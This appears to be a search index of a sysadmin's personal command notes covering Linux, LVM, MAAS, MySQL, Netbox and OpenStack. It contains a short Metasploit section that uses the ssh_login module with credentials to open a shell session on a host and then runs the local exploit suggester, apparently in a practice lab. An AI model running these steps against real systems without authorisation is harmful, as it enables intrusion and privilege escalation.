    "},{"location":"linux/#using-the-ip-tool-to-change-connecticity","title":"Using the \"ip\" tool to change connecticity\"","text":"
    ip link set $DEV_NAME down\nip link set $DEV_NAME up\n\nip route add default via $DEF_GW_IP dev $DEV_NAME\nip addr add $IP_ADDR_CIDR dev $DEV_NAME\nip addr delete $IP_ADDR_CIDR dev $DEV_NAME\n
    "},{"location":"linux/#fix-br-and-vmbr-linux-bridges-filtering-lldp-packets","title":"Fix BR and VMBR Linux bridges filtering LLDP packets","text":"
    https://interestingtraffic.nl/2017/11/21/an-oddly-specific-post-about-group_fwd_mask/\n\necho 16384 > /sys/class/net/$VMBR_INTERFACE/bridge/group_fwd_mask\n
    "},{"location":"linux/#add-fish-as-the-default-shell-for-ubuntudebian","title":"Add fish as the default shell for Ubuntu/Debian.","text":"
    sudo apt-get install fish\n\ncoldadmin@big-potato ~> cat /etc/shells \n# /etc/shells: valid login shells\n/bin/sh\n/bin/bash\n/bin/rbash\n/bin/dash\n/usr/bin/tmux\n/usr/bin/fish\n\nchsh -s /usr/bin/fish\n
    "},{"location":"linux/#one-history-file-for-multiple-prompts","title":"One history file for multiple prompts.","text":"
    vim ~/.bashrc\nexport PROMPT_COMMAND='history -a'\n
    "},{"location":"linux/#enable-terminus-powerline-on-ubuntu-font-name-is-terminess","title":"Enable Terminus Powerline on Ubuntu (font name is Terminess)","text":"
    https://github.com/powerline/fonts/issues/210\nhttps://superuser.com/questions/886023/linux-mint-installing-bdf-fonts-with-console-fc-cache-fc-list\n\ngit clone https://github.com/powerline/fonts\ncd fonts\n./install.sh\n\ncd /etc/fonts/conf.d/\nsudo rm /etc/fonts/conf.d/10*  \nsudo rm -rf 70-no-bitmaps.conf \nsudo ln -s ../conf.avail/70-yes-bitmaps.conf .\nsudo dpkg-reconfigure fontconfig\n
    "},{"location":"linux/#ubuntu-1904-disable-ubuntu-dock-completely","title":"Ubuntu 19.04 - Disable Ubuntu dock completely.","text":"

    https://askubuntu.com/questions/1030138/how-can-i-get-rid-of-the-dock-in-ubuntu-18

    cd /usr/share/gnome-shell/extensions/\nsudo mv ubuntu-dock@ubuntu.com{,.bak}\n
    "},{"location":"linux/#change-fan-speed-of-a-r710-through-ipmi","title":"Change fan speed of a R710 through IPMI.","text":"

    IPMI needs to be enabled in ILO! You need valid credentials! This disables the auto-adjust of the fan speed, be careful of the R710 heating. I am not responsible for fires :)

    #Get the ENV data from the IPMI\nipmitool  -I lanplus -H 10.200.10.113 -U root -P $PASSWORD sensor reading \"Ambient Temp\" \"FAN 1 RPM\" \"FAN 2 RPM\" \"FAN 3 RPM\"\n\n#Enable manual fan control.\nipmitool  -I lanplus -H 10.200.10.113 -U root -P $PASSWORD raw 0x30 0x30 0x01 0x00\n\n#\"Activating manual fan speeds! (2160 RPM)\"\nipmitool  -I lanplus -H 10.200.10.113 -U root -P $PASSWORD raw 0x30 0x30 0x02 0xff 0x09\n
    "},{"location":"linux/#check-bonding-status","title":"Check bonding status","text":"
    cat /proc/net/bonding/mgmt\ncat /proc/net/bonding/$INTERFACE_NAME_HERE\n
    "},{"location":"linux/#get-low-level-interface-stats","title":"Get low-level interface stats","text":"
    ethtool -S $INTERFACE_NAME_HERE\nethtool -S mgmt-1\n
    "},{"location":"linux/#ssh-without-using-all-identity-files-automatically","title":"SSH without using all identity files automatically","text":"
    ssh -o \"IdentitiesOnly true\" -v -A user@host\n
    "},{"location":"linux/#remove-resolvctl-issues-with-openvpn-dns-being-removed","title":"Remove resolvctl (issues with OpenVPN DNS being removed)","text":"
    sudo systemctl disable systemd-resolved.service\nsudo systemctl stop systemd-resolved.service\n\ndns=default in [main] section of \"sudo vi /etc/NetworkManager/NetworkManager.conf\"\n\nsudo rm /etc/resolv.conf\nsudo service network-manager restart\n
    "},{"location":"linux/#troubleshoot-apt-install-errors","title":"Troubleshoot APT install errors.","text":"
    # Find the correct file from :\ncd /var/lib/dpkg/info/\n# In this case, it was the Foreman postinst script\ncat foreman.postinst\n# Increase verbosity\nEXPORT DEBUG=1\n# Run the failing configure package\ndpkg --configure foreman\n
    "},{"location":"linux/#docker-hugo","title":"Docker Hugo","text":"
    docker run --rm -it -v /srv/hugo:/src -u hugo laurentfdumont/laurent-hugo hugo new site mysite\ndocker run --rm -it -v /srv/hugo/mysite:/src -u hugo laurentfdumont/laurent-hugo hugo new posts/my-first-post.md\ndocker run --rm -it -v /srv/hugo/mysite/:/src -u hugo laurentfdumont/laurent-hugo hugo\ndocker run --rm -it -v /srv/hugo/mysite:/src -p 1313:1313 -u hugo laurentfdumont/laurent-hugo hugo server -b http://linode2.coldnorthadmin.com -w --bind=0.0.0.0\ndocker run --rm -it -v /srv/hugo/mysite:/src -u hugo laurentfdumont/laurent-hugo hugo new posts/my-first-post.md\ndocker run --rm -it -v /srv/hugo:/src -u hugo jguyomard/hugo-builder hugo new site mysite \n
    "},{"location":"linux/#check-and-clean-for-fstrim","title":"Check and clean for FSTRIM","text":"

    Only support for SCSI disk - proxmox.

    #Check TRIM support status\nlsblk -D\n\n### BAD NO support\nroot@kolla-controller003:~# lsblk -D\nNAME              DISC-ALN DISC-GRAN DISC-MAX DISC-ZERO\nvda                      0        0B       0B         0\n|-vda1                   0        0B       0B         0\n|-vda2                   0        0B       0B         0\n`-vda5                   0        0B       0B         0\n  |-system-root          0        0B       0B         0\n  `-system-swap_1        0        0B       0B         0\n\n### OK support\nroot@kolla-compute004:~# lsblk -D\nNAME              DISC-ALN DISC-GRAN DISC-MAX DISC-ZERO\nsda                      0        4K       1G         0\n|-sda1                   0        4K       1G         0\n|-sda2                1024        4K       1G         0\n`-sda5                   0        4K       1G         0\n  |-system-root          0        4K       1G         0\n  `-system-swap_1        0        4K       1G         0\n\n### Start TRIM PROCESS\nfstrim -av\nroot@kolla-compute004:~# fstrim -av\n/boot: 755.4 MiB (792125440 bytes) trimmed\n/: 49 GiB (52552167424 bytes) trimmed\n
    "},{"location":"linux/#reduce-swap-size-and-increase-root-fs-size","title":"Reduce swap size and increase root FS size","text":"
    # Disable swap temporarly.\nswapoff -a\n\n# Reduce swap paritition.\nlvreduce /dev/superbacon-vg/swap_1 -L -67G\n\n# Extend LVM root paritition.\nlvextend /dev/superbacon-vg/root -L +67G\n\n# Extend actual partition size.\nresize2fs /dev/superbacon-vg/root\n\n# Recreate swap partition\nmkswap /dev/superbacon-vg/swap_1\n\n# Re-enable swap partition\nswapon -a\n
    "},{"location":"linux/#mount-disk-to-linux","title":"Mount disk to linux","text":"
    # Create an ext4 partition.\nmkfs.ext4 /dev/vg-storage/lv-storage\n\n# Mount the partition to test.\nmount -t ext4 /dev/vg-storage/lv-storage /mnt\n\n# Mount in /etc/fstab\n/dev/mapper/vg--storage-lv--storage /storage    ext4    defaults,nofail        0    1\n
    "},{"location":"linux/#check-iscsi-disks","title":"Check ISCSI disks","text":"
    sudo lsblk -S\n
    "},{"location":"linux/#boot-logs","title":"Boot logs","text":"
    /var/log/boot.log  ---  System boot log\n\n/var/log/dmesg     ---  print or control the kernel ring buffer\n
    "},{"location":"linux/#upgrade-kernel-on-centos7","title":"Upgrade Kernel on Centos7","text":"
    [root@ooo-director ~]# rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org\n[root@ooo-director ~]# yum install https://www.elrepo.org/elrepo-release-7.0-4.el7.elrepo.noarch.rpm\n
    [root@ooo-director ~]# yum repolist\nLoaded plugins: fastestmirror, priorities\nLoading mirror speeds from cached hostfile\n * base: mirror.calgah.com\n * elrepo: iad.mirror.rackspace.com\n * extras: mirror.calgah.com\n * updates: mirror.calgah.com\nrepo id                                                repo name                                                                                       status\nbase/7/x86_64                                          CentOS-7 - Base                                                                                  10,097\ndelorean-train                                         delorean-openstack-trove-7680b5ef0e3608b2c45f057f65337c4af3d5659d                               801+348\ndelorean-train-build-deps                              dlrn-train-build-deps                                                                            139+78\ndelorean-train-testing                                 dlrn-train-testing                                                                              875+823\nelrepo                                                 ELRepo.org Community Enterprise Linux Repository - el7                                              139\nextras/7/x86_64                                        CentOS-7 - Extras                                                                                   307\nrdo-qemu-ev/x86_64                                     RDO CentOS-7 - QEMU EV                                                                               87\nupdates/7/x86_64                                       CentOS-7 - Updates                                                                                1,010\nrepolist: 13,455\n
    yum --enablerepo=elrepo-kernel install kernel-ml\n
    [root@ooo-director ~]# awk -F\\' '$1==\"menuentry \" {print i++ \" : \" $2}' /etc/grub2.cfg\n0 : CentOS Linux (5.4.6-1.el7.elrepo.x86_64) 7 (Core)\n1 : CentOS Linux (3.10.0-1062.9.1.el7.x86_64) 7 (Core)\n2 : CentOS Linux (3.10.0-1062.el7.x86_64) 7 (Core)\n3 : CentOS Linux (0-rescue-4fb19b5248cd40d9b9a1ec7361f4f1fa) 7 (Core)\n\n[root@ooo-director ~]# grub2-set-default 0\n\n[root@ooo-director ~]# grub2-mkconfig -o /boot/grub2/grub.cfg\nGenerating grub configuration file ...\nFound linux image: /boot/vmlinuz-5.4.6-1.el7.elrepo.x86_64\nFound initrd image: /boot/initramfs-5.4.6-1.el7.elrepo.x86_64.img\nFound linux image: /boot/vmlinuz-3.10.0-1062.9.1.el7.x86_64\nFound initrd image: /boot/initramfs-3.10.0-1062.9.1.el7.x86_64.img\nFound linux image: /boot/vmlinuz-3.10.0-1062.el7.x86_64\nFound initrd image: /boot/initramfs-3.10.0-1062.el7.x86_64.img\nFound linux image: /boot/vmlinuz-0-rescue-4fb19b5248cd40d9b9a1ec7361f4f1fa\nFound initrd image: /boot/initramfs-0-rescue-4fb19b5248cd40d9b9a1ec7361f4f1fa.img\ndone\n
    "},{"location":"linux/#ps-a-process-list-for-process-accounting","title":"PS a process list for process accounting","text":"
    ps -eo cmd \n
    "},{"location":"linux/#send-a-sysrq-though-kvm","title":"Send a sysrq though KVM","text":"

    Types of event Dec 26 20:04:49 director kernel: SysRq : HELP : loglevel(0-9) reboot(b) crash(c) terminate-all-tasks(e) memory-full-oom-kill(f) kill-all-tasks(i) thaw-filesystems(j) sak(k) show-backtrace-all-active-cpus(l) show-memory-usage(m) nice-all-RT-tasks(n) poweroff(o) show-registers(p) show-all-timers(q) unraw(r) sync(s) show-task-states(t) unmount(u) force-fb(V) show-blocked-tasks(w) dump-ftrace-buffer(z)

    #In the guest VM\necho 1 > /proc/sys/kernel/sysrq\n\n#To make it permanent\n[root@director ~]# cat /etc/sysctl.d/sysrq.conf \nkernel.sysrq = 1\n\n#From the Hypervisor\n#KEY_B replace what is after the _ for the correct action. This will reboot the target host.\nroot@kvm01:/tmp# virsh send-key ooo-director KEY_LEFTALT KEY_SYSRQ KEY_B\n
    "},{"location":"linux/#install-pgcli-postgres-cmd-line-cli-ubuntu-1904","title":"Install pgcli - postgres cmd line CLI - Ubuntu 19.04","text":"
    sudo apt-get install libpq-dev python-dev\npip3 install pgcli\npgcli --host 127.0.0.1 --port 5432 --user ara_user --dbname ara --password\n
    "},{"location":"linux/#redhat-centos-bonding-lacp-vlan","title":"Redhat / Centos bonding LACP - VLAN","text":"
    modprobe bonding\n\n#vi /etc/sysconfig/network-scripts/ifcfg-bond0\nDEVICE=bond0\nType=Bond\nNAME=bond0\nBONDING_MASTER=yes\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nBONDING_OPTS=\"mode=4 miimon=100 lacp_rate=1\"\n\n#vi /etc/sysconfig/network-scripts/ifcfg-em1\nDEVICE=em1\nTYPE=Ethernet\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nIPV6INIT=no\nMASTER=bond0\nSLAVE=yes\n\n#vi /etc/sysconfig/network-scripts/ifcfg-em2\nDEVICE=em2\nTYPE=Ethernet\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nIPV6INIT=no\nMASTER=bond0\nSLAVE=yes\n\n#vi /etc/sysconfig/network-scripts/ifcfg-em3\nDEVICE=em3\nTYPE=Ethernet\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nIPV6INIT=no\nMASTER=bond0\nSLAVE=yes\n
    "},{"location":"linux/#write-speed-test","title":"Write speed test","text":"

    https://www.thomas-krenn.com/en/wiki/Linux_I/O_Performance_Tests_using_dd

    dd if=/dev/zero of=/root/testfile bs=1G count=1 oflag=dsync\n
    "},{"location":"linux/#extend-lv","title":"Extend lv","text":"
    sudo lvextend -l +100%FREE /dev/ubuntu-vg/ubuntu-lv\nsudo resize2fs /dev/ubuntu-vg/ubuntu-lv\n
    "},{"location":"linux/#set-dns-with-resolvctl","title":"Set DNS with resolvctl","text":"
    laurentdumont@docker01:/srv$ sudo resolvectl dns \nGlobal:\nLink 17 (vethc025466):\nLink 15 (vetheb3b292):\nLink 13 (veth45fcbdc):\nLink 3 (docker0):\nLink 2 (ens192): 10.199.199.1\n\n\nsudo resolvectl dns ens192 10.199.199.1\n
    "},{"location":"linux/#fix-openvpn-dns-issues-with-new-resolved-for-dns","title":"Fix openvpn DNS issues with new resolved for DNS","text":"
    sudo apt install openvpn-systemd-resolved\n
    "},{"location":"linux/#show-disk-info","title":"Show disk info","text":"
    lshw -class disk\nhwinfo --disk\n
    "},{"location":"linux/#create-one-pdf-from-multiple","title":"Create one PDF from multiple","text":"
    # From within folder containing the PDF pages \nqpdf --empty --pages *.pdf -- out.pdf\n
    "},{"location":"linux/#change-image-size","title":"Change image size","text":"
    convert myfigure.png -resize 200x100 myfigure.jpg\n
    "},{"location":"lvm/","title":"LVM","text":""},{"location":"lvm/#reduce-swap-and-extend-other-lvm-module","title":"Reduce swap and extend other LVM module","text":"
    # Disable swap temporarly.\nswapoff -a\n\n# Reduce swap paritition.\nlvreduce /dev/superbacon-vg/swap_1 -L -67G\n\n# Extend LVM root paritition.\nlvextend /dev/superbacon-vg/root -L +67G\n\n# Extend actual partition size.\nresize2fs /dev/superbacon-vg/root\n\n# Recreate swap partition\nmkswap /dev/superbacon-vg/swap_1\n\n# Re-enable swap partition\nswapon -a\n\n----------------- Mount partition from existing VG/LV -----------------\n# Create an ext4 partition.\nmkfs.ext4 /dev/vg-storage/lv-storage\n\n# Mount the partition to test.\nmount -t ext4 /dev/vg-storage/lv-storage /mnt\n\n# Mount in /etc/fstab\n/dev/mapper/vg--storage-lv--storage /storage    ext4    defaults,nofail        0    1\n
    7  echo \"deb http://download.proxmox.com/debian/pve stretch pve-no-subscription\" > /etc/apt/sources.list.d/pve-install-repo.list\n    8  wget http://download.proxmox.com/debian/proxmox-ve-release-5.x.gpg -O /etc/apt/trusted.gpg.d/proxmox-ve-release-5.x.gpg\n    9  apt update && apt dist-upgrade\n   10  apt install proxmox-ve postfix open-iscsi\n   11  clear\n   12  shutdown -r now\n   13  mount /dev/sdb1 /storage\n   14  mkdir /storage\n   15  mount /dev/sdb1 /storage\n   16  mount /dev/sdb /storage\n   17  mount -t ext4 /dev/sdb /storage\n   18  dmesg | tail\n   19  fdisk -l\n   20  lvdisplay \n   21  vgdisplay \n   22  vgscan \n   23  fdisk -l\n   24  clear\n   25  vgdisplay \n   26  lvmdiskscan \n   27  vgcreate \n   28  vgcreate /dev/sdb1\n   29  pvs\n   30  vgcreate vg-storage /dev/sdb1\n   31  vgdisplay \n   32  man lvcreate \n   33  lvcreate -n storage -l 100%FREE vg-storage\n   34  lvdisplay \n   35  clear\n   36  mkfs.ext4 /dev/vg-storage/storage\n   37  lvdisplay \n   38  man mount\n   39  man mount\n   40  man mount\n   41  mount -t ext4 /dev/vg-storage/storage /storage\n   42  cd /storage\n   43  mkdir tata\n   44  ls\n   45  rm tata\n   46  rm -rf tata\n   47  clear\n   48  exit\n   49  history\n
    "},{"location":"maas/","title":"MAAS","text":""},{"location":"maas/#adding-a-custom-power-provider-for-maas","title":"Adding a custom power provider for MAAS.","text":""},{"location":"maas/#install-proxmoxer-for-python3","title":"Install proxmoxer for Python3","text":"
    pip3 install proxmoxer\n
    "},{"location":"maas/#proxmox-script-source-httpsbugslaunchpadnetmaasbug1805799","title":"Proxmox Script - source https://bugs.launchpad.net/maas/+bug/1805799","text":"
    # Copyright 2018 Wojciech Rakoniewski  \n# This software is licensed under the\n# GNU Affero General Public License version 3 (see the file LICENSE).\n#\n# tested on Proxmox VE 5.2-11 but should work with any version\n# libraries: proxmoxer\n#   tested with version 1.02 installed using apt\n\n\"\"\"Proxmox Power Driver for MAAS\"\"\"\n\n__all__ = [\n        \"ProxmoxError\",\n        \"ProxmoxPowerDriver\"\n        ]\n\nfrom provisioningserver.drivers import (\n    make_ip_extractor,\n    make_setting_field,\n    SETTING_SCOPE,\n)\nfrom provisioningserver.drivers.power import (\n    PowerDriver,\n    PowerError\n)\n\ntry:\n    from proxmoxer import ProxmoxAPI\n    PROXMOXER_IMPORTED = True\nexcept ImportError:\n    PROXMOXER_IMPORTED = False\n\nPROXMOX_YES=\"y\"\nPROXMOX_NO=\"n\"\n\nPROXMOX_VALIDATE_SSL_CHOICES = [\n    [PROXMOX_YES, \"Yes\"],\n    [PROXMOX_NO, \"No\"]]\n\nclass ProxmoxError(PowerError):\n    \"\"\"Failure communicating to proxmox \"\"\"\n\nclass ProxmoxPowerDriver(PowerDriver):\n\n    name = 'proxmox'\n    chassis = True\n    description = \"Proxmox (virtual systems)\"\n    settings = [\n        make_setting_field(\n            'power_vm_name', \"VM id or name\", required=True,\n            scope=SETTING_SCOPE.NODE),\n        make_setting_field('power_address', \n            \"Proxmox host name or ip\", required=True),\n        make_setting_field('power_user', \n            \"Proxmox username (user@realm)\", required=True),\n        make_setting_field(\n            'power_pass', \"Proxmox password\", field_type='password',\n            required=True),\n        make_setting_field('power_ssl_validate', \"Validate ssl\", \n            field_type='choice', required=True, \n            choices=PROXMOX_VALIDATE_SSL_CHOICES, default=PROXMOX_NO),\n    ]\n    ip_extractor = make_ip_extractor('power_address')\n\n    def detect_missing_packages(self):\n        if not PROXMOXER_IMPORTED:\n            return [\"python3-proxmoxer\"]\n        return []\n\n    def power_on(self, system_id, context):\n        \"\"\"Power on Proxmox node.\"\"\"\n        vm=self.__proxmox_login(system_id,context)\n        vm.status.start.post();\n\n    def power_off(self, system_id, context):\n        \"\"\"Power off Proxmox node.\"\"\"\n        vm=self.__proxmox_login(system_id,context)\n        vm.status.stop.post();\n\n    def power_query(self, system_id, context):\n        \"\"\"Power query Proxmox node.\"\"\"\n        vm=self.__proxmox_login(system_id,context)\n        ncd=vm.status.current.get()\n\n        if ncd['status'] == 'running':\n            return \"on\"\n        else:\n            return \"off\"\n\n\n    def __proxmox_login(self,system_id,context):\n        \"\"\"Login to proxmox server.\"\"\"\n\n        api_host = context.get('power_address')\n        api_user = context.get('power_user')\n        api_password = context.get('power_pass')\n        vm_id = context.get('power_vm_name')\n        api_ssl_val = (context.get('power_validate_ssl')==PROXMOX_YES)\n\n        try:\n            api = ProxmoxAPI(api_host, user=api_user, \n                    password=api_password, verify_ssl=api_ssl_val)\n\n            con_vm=None\n            for vm in api.cluster.resources.get(type=\"vm\"):\n                if (str(vm['vmid'])==vm_id) or (vm['name']==vm_id):\n                    con_vm=vm\n                    break\n\n        except Exception:\n            raise ProxmoxError(\n                    \"Can't connect to proxmox cluster %s\" % (api_host))\n\n        if con_vm is None:\n            \"\"\"vm not found\"\"\"\n            raise ProxmoxError(\n                    \"Virtual machine %s not found on proxmox cluster %s\" % (vm_id, api_host))\n\n        #extract node object\n        vm_obj=getattr(getattr(getattr(api.nodes,con_vm['node']),\n            con_vm['type']),\n            str(con_vm['vmid']))\n\n        return vm_obj\n
    "},{"location":"maas/#location-of-the-power-scripts-for-maas","title":"Location of the power scripts for MAAS.","text":"
    /usr/lib/python3/dist-packages/provisioningserver/drivers/power/proxmox.py\n/usr/lib/python3/dist-packages/provisioningserver/drivers/power/registry.py\n
    "},{"location":"maas/#edit-registrypy-and-add-the-following-lines-to-the-bottom-of-the-import-section","title":"Edit registry.py and add the following lines to the bottom of the import section.","text":"
    from provisioningserver.drivers.power.proxmox import ProxmoxPowerDriver\n
    "},{"location":"maas/#add-the-following-line-to-the-bottom-of-the-power_drivers-array","title":"Add the following line to the bottom of the power_drivers array.","text":"
    ProxmoxPowerDriver(),\n
    # Register all the power drivers.\npower_drivers = [\n    AMTPowerDriver(),\n    APCPowerDriver(),\n    DLIPowerDriver(),\n    FenceCDUPowerDriver(),\n    HMCPowerDriver(),\n    IPMIPowerDriver(),\n    ManualPowerDriver(),\n    MoonshotIPMIPowerDriver(),\n    MSCMPowerDriver(),\n    MicrosoftOCSPowerDriver(),\n    NovaPowerDriver(),\n    RECSPowerDriver(),\n    SeaMicroPowerDriver(),\n    UCSMPowerDriver(),\n    VirshPowerDriver(),\n    VMwarePowerDriver(),\n    WedgePowerDriver(),\n    ProxmoxPowerDriver(),\n]\n
    "},{"location":"maas/#restart-the-rack-controller","title":"Restart the rack controller.","text":"
    systemctl restart maas-rackd\n
    "},{"location":"metasploit/","title":"Metasploit","text":""},{"location":"metasploit/#metasploit-plugins","title":"Metasploit plugins","text":""},{"location":"metasploit/#how-to-use-an-ssh-login-as-a-msf-session","title":"How to use an ssh login as a msf session","text":"
    use auxiliary/scanner/ssh/ssh_login\nset rhosts 10.10.127.204\nset username typhoon\nset password 789456123\n\n# show sessions\nsessions\n\nmsf5 post(multi/recon/local_exploit_suggester) > sessions\n\nActive sessions\n===============\n\n  Id  Name  Type         Information                               Connection\n  --  ----  ----         -----------                               ----------\n  1         shell linux  SSH typhoon:789456123 (10.10.127.204:22)  10.9.179.67:40461 -> 10.10.127.204:22 (10.10.127.204)\n\n# use specific session\nset session 1\n
    "},{"location":"metasploit/#use-the-msf-exploit-suggestion","title":"Use the msf exploit suggestion","text":"
    use post/multi/recon/local_exploit_suggester\nexploit\n
    "},{"location":"molecule/","title":"Molecule","text":""},{"location":"molecule/#testing-framework-for-ansible","title":"Testing framework for Ansible.","text":""},{"location":"molecule/#installation-ubuntu-1804-lts","title":"Installation Ubuntu 18.04 LTS","text":"
    sudo apt-get install -y python-pip libssl-dev\npip install --user molecule\n
    "},{"location":"molecule/#create-a-test-setup-in-an-existing-role","title":"Create a test setup in an existing role","text":"
    #From within the role folder\nmolecule init scenario -r my-role-name\n
    "},{"location":"molecule/#start-a-full-testing-run","title":"Start a full testing run","text":"
    sudo molecule test\n
    "},{"location":"mysql/","title":"MySQL/MariaDB","text":""},{"location":"mysql/#create-database-and-user","title":"Create Database and user.","text":"
    CREATE DATABASE `racktables`;\nCREATE USER 'racktables_user' IDENTIFIED BY 'test';\nGRANT ALL privileges ON `racktables`.* TO 'racktables_user'@'%';\n\n\nCREATE DATABASE `netbox`;\nCREATE USER 'netbox_user' IDENTIFIED BY 'test';\nGRANT ALL privileges ON `netbox`.* TO 'netbox_user'@'%';\n
    "},{"location":"mysql/#check-galera-status","title":"Check Galera status","text":"
    MariaDB [(none)]> SHOW GLOBAL STATUS LIKE 'wsrep_%';\n
    "},{"location":"netbox/","title":"Netbox","text":"
    apt-get update\napt-get install -y postgresql libpq-dev\n
    sudo -u postgres psql\nCREATE DATABASE netbox;\nCREATE USER netbox WITH PASSWORD 'bigpotato';\nGRANT ALL PRIVILEGES ON DATABASE netbox TO netbox;\n\\q\n
    apt-get install -y python3 python3-dev python3-setuptools build-essential libxml2-dev libxslt1-dev libffi-dev graphviz libpq-dev libssl-dev zlib1g-dev\neasy_install3 pip\n
    mkdir -p /opt/netbox/ && cd /opt/netbox/\ngit clone -b master https://github.com/digitalocean/netbox.git .\npip3 install -r requirements.txt\npip3 install napalm\n
    sudo apt-get install libapache2-mod-wsgi\nsudo a2enmod wsgi\nsudo a2enmod proxy\nsudo a2enmod proxy_http\nsudo a2enmod headers\nsudo a2ensite netbox\nsudo service apache2 restart\n
    <VirtualHost *:80>\n    ServerName netbox.northernsysadmin.com\n    Redirect permanent / https://netbox.northernsysadmin.com/\n</VirtualHost>\n\n<VirtualHost *:443>\n    SSLEngine on\n    SSLCertificateFile $FULL_CHAIN_CERT_HERE\n    SSLCertificateKeyFile $PRIVATE_KEY_CERT_HERE\n    ProxyPreserveHost On\n\n    ServerName netbox.northernsysadmin.com\n\n    Alias /static /opt/netbox/netbox/static\n\n    # Needed to allow token-based API authentication\n    WSGIPassAuthorization on\n\n    <Directory />\n          SetEnvIfNoCase Host netbox.northernsysadmin\\.com VALID_HOST\n          Order Deny,Allow\n          Deny from All\n          Allow from env=VALID_HOST\n    </Directory>\n\n    <Directory /opt/netbox/netbox/static>\n        Options Indexes FollowSymLinks MultiViews\n        AllowOverride None\n        Require all granted\n    </Directory>\n\n    <Location /static>\n        ProxyPass !\n    </Location>\n\n    RequestHeader set \"X-Forwarded-Proto\" expr=%{REQUEST_SCHEME}\n    ProxyPass / http://127.0.0.1:8001/\n    ProxyPassReverse / http://127.0.0.1:8001/\n</VirtualHost>\n
    "},{"location":"openstack/","title":"Openstack","text":""},{"location":"openstack/#general-troubleshoot-shamelessly-stolen-from-httpwwwpanticzdeindexphpopenstack","title":"General troubleshoot - Shamelessly stolen from : http://www.panticz.de/index.php/openstack","text":"
    # list VMs on all hypervisor\nopenstack server list --all --long  -c Name -c Host\n\n# list VMs on specific hypervisor\nopenstack server list --all -c Name -f value --host ${COMPUTE_NODE}\n\n# get VM count by hypervisor\nopenstack server list --all --long  -c Host -f value | sort | uniq -c\n\n# list compute nodes\nopenstack compute service list\n\n# list compute service\nopenstack compute service list --host ${OS_NODE}\n\n# disable compute service\nfor OS_SERVICE in $(openstack compute service list --host ${OS_NODE} -c Binary -f value); do\n    openstack compute service set --disable --disable-reason \"Maintenance\" ${OS_NODE} ${OS_SERVICE}\ndone\n\nopenstack compute service set --disable --disable-reason potato qasite1-compute001.localdomain nova-compute\n\n# Search for server witch status error\nopenstack server list --all --status ERROR\n\n# Search for server with status resizing\nopenstack server list --all --status=VERIFY_RESIZE\n\n# List instances / VMs\nopenstack server list\nopenstack server list -c ID -c Name -c Status -c Networks -c Host --long\n
    "},{"location":"openstack/#start-all-vms-on-a-single-compute","title":"Start all VMs on a single compute","text":"
    for x in `openstack server list --all -c ID -f value --host tenlab1-compute002.localdomain`;do openstack server start $x;done \n
    "},{"location":"openstack/#migrate-to-specific-compute","title":"Migrate to specific compute","text":"
    nova host-evacuate --target_host kolla-compute003 kolla-compute004.cmaker.studio\nwatch nova migration-list\n
    "},{"location":"openstack/#get-all-the-keypairs-existing-for-all-users","title":"Get all the keypairs existing for all users","text":"
    for x in `openstack user list -f value -c ID`;do echo $x && nova keypair-list --user $x;done\n
    "},{"location":"openstack/#evacuate-single-server-from-compute","title":"Evacuate single server from compute","text":"
    nova evacuate 1d6a436b-e18e-45ce-8b01-bee4a7126f81\n
    "},{"location":"openstack/#evacuate-single-server-from-compute-to-a-specific-destination","title":"Evacuate single server from compute to a specific destination","text":"
    nova evacuate 5f58a1bf-a7f9-4952-b980-af9d52a11e66 qasite1-compute001.localdomain\n
    "},{"location":"openstack/#openstack-create-image-with-different-id","title":"Openstack create image with different id.","text":"

    Use the --id flag

    openstack image create --id cirros-0.4.0 --disk-format qcow2 --container-format bare --public --file ./cirros-0.4.0-x86_64-disk.img cirros-0.4.0\n
    07d76f4e-c920-49ea-af06-bd3c322f16cf\n\nopenstack router set --external-gateway EXT_NET --enable-snat --fixed-ip subnet=EXT_SUB,ip-address=192.168.70.2\n\nneutron net-create PROV_NET --shared --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 71\nneutron subnet-create PROV_NET --name PROV_SUB --disable-dhcp --gateway 192.168.71.1 192.168.71.0/24\n\nneutron net-create EXT_NET --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 70\nneutron subnet-create EXT_NET --name EXT_SUB --allocation-pool start=192.168.70.10,end=192.168.70.100 --disable-dhcp --gateway 192.168.70.1 192.168.70.0/24\n\nnetwork : e23f7863-6e84-4395-bbbb-45877e950f2a\nsubnet : 5bee0941-8d7f-4869-896d-e34e1f2e8b3d\n\n9ce38b2c-b13b-4e65-8e68-32b146115a62 : openstack port create --fixed-ip subnet=5bee0941-8d7f-4869-896d-e34e1f2e8b3d,ip-address=10.100.100.10 --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus_1\n\neefa2140-fd69-4daf-8b0d-0eafcf3e24b9 : openstack port create --fixed-ip subnet=5bee0941-8d7f-4869-896d-e34e1f2e8b3d,ip-address=10.100.100.11 --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus_2\n\nneutron net-create PROV_NET --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 71\nneutron subnet-create PROV_NET --name PROV_SUB --allocation-pool start=192.168.71.10,end=192.168.71.100 --disable-dhcp --gateway 192.168.71.1 192.168.71.0/24\nneutron net-create PROV_NET --shared --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 71\nneutron subnet-create PROV_NET --name PROV_SUB --disable-dhcp --gateway 192.168.71.1 192.168.71.0/24\n
    "},{"location":"openstack/#random-useful-commands","title":"Random useful commands","text":"
    openstack server list --all -c ID -c Name --host $NOVA_COMPUTE_NAME_HERE -f value\n
    "},{"location":"openstack/#upload-custom-image","title":"Upload custom image","text":"
    openstack image create --disk-format qcow2 --container-format bare --public --file ./cirros-0.4.0-x86_64-disk.img cirros-0.4.0\n
    "},{"location":"openstack/#create-flavor","title":"Create flavor","text":"
